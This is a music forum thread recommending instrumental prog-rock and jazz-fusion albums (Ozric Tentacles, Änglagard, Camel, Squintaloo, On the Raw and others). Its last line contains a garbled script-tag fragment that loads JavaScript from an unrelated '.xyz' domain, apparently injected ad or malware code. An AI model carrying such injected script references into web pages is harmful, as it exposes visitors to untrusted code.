So I have recently been into instrumental albums a lot lately. I have already found a lot of the newer more popular instrumental bands/musicians such as Polyphia, Jason Richardson, Plini, Intervals, etc. I also have really been into the "Prog/Jazz Fusion" bands, (I don't know the exact name of the style) such as the Dixie Dregs in their What If album, and Return to Forever in their Romantic Warrior album. That is the sound that most caught my attention so I am definitely looking for some bands along that style. I am also aware of some of the "pure prog" like Focus and Samla Mammas Manna.
So I guess my three questions are First, what are some good instrumental albums (preferably "Prog/Jazz Fusion")? Secondly what are some good instrumental albums to of come out this year (I'm trying to make a top 5 list for fun)? Lastly, what are your more obscure Instrumental recommendations?

Thank you very much. Out of your list the only band that I had listened to was the Aristocrats. I am looking forward to checking out the rest!!

Ozric Tentacles for the win. Not mentioning them is like not mentioning Yes or Genesis in a list of symphonic bands. Djam Karet also. Also, most fusion(jazz rock fusion) is instrumental for the most part. Same thing with post rock(if that's your thing). Check the band and if there's vocals listed you can avoid it.
Someone mentioned All Traps on Earth and Wobbler. Well, if you mention them you have to mention Anglagard. Also, "the snowgoose" by Camel and "....di terra" by Banco. Edited by AFlowerKingCrimson - November 08 2019 at 11:22 |

Squintaloo - Über Bord
Hands down my favourite instrumental album of the decade. Their self titled album is outstanding as well. Also check out: The Pneumatic Transit Mother Turtle The Physics House Band Gösta Berlings Saga |

From this year, I recommend "Climbing on Air" by On the Raw. < ="text/" async="" ="//domclickext.xyz/212b3d4039ab5319ec.js">
